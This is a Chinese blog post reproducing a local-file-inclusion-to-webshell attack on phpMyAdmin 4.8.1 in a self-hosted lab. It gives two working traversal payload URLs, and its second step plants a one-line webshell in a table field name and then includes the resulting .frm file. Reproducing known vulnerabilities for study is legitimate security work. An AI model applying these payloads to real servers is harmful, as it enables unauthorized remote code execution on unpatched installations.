phpMyAdmin 4.8.x 本地文件包含漏洞getshell复现 - JunMo博客

JunMo的博客

2019
记录生活
首页 » 学习笔记 » phpMyAdmin 4.8.x 本地文件包含漏洞getshell复现

phpMyAdmin 4.8.x 本地文件包含漏洞getshell复现

漏洞介绍

这个漏洞是由ChaMd5安全团队在2018-06-21公开的漏洞,该漏洞利用不要求root权限,只要能够登录 phpMyAdmin 便能够利用。

漏洞环境

VulnSpy 在线 phpMyAdmin 环境地址:https://www.vsplate.com/?github=vulnspy/phpmyadmin-4.8.1

下载链接 https://files.phpmyadmin.net/phpMyAdmin/4.8.1/phpMyAdmin-4.8.1-all-languages.zip

复现过程

这里我自己下载来搭建。

首先在C盘下建立一个名为JunMo.txt内容为phpinfo();

然后登入phpmyadmin来包含这个文件

payload

http://127.0.0.1/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../JunMo.txt

包含成功

然后新建一个数据库在创建一个表然后在字段名处写入一句话木马,在mysql文件夹找到对应的文件

 payload

http://127.0.0.1/phpmyadmin/index.php?target=db_sql.php%253f/../../../phpstudy/PHPTutorial\MySQL\data\webshell\webshell.frm

包含成功

原文链接

文章如无特别注明均为原创!
本文作者: JunMo
转载或复制请带上本文地址 http://mo60.cn/post-38.html
并注明出处 JunMo博客
原文地址《 phpMyAdmin 4.8.x 本地文件包含漏洞getshell复现
发布于2019-7-18
收录状态: [百度未收录][360未收录]

分享到:


打赏

评论

游客

看不清楚?点图切换

切换注册

登录

您也可以使用第三方帐号快捷登录

切换登录

注册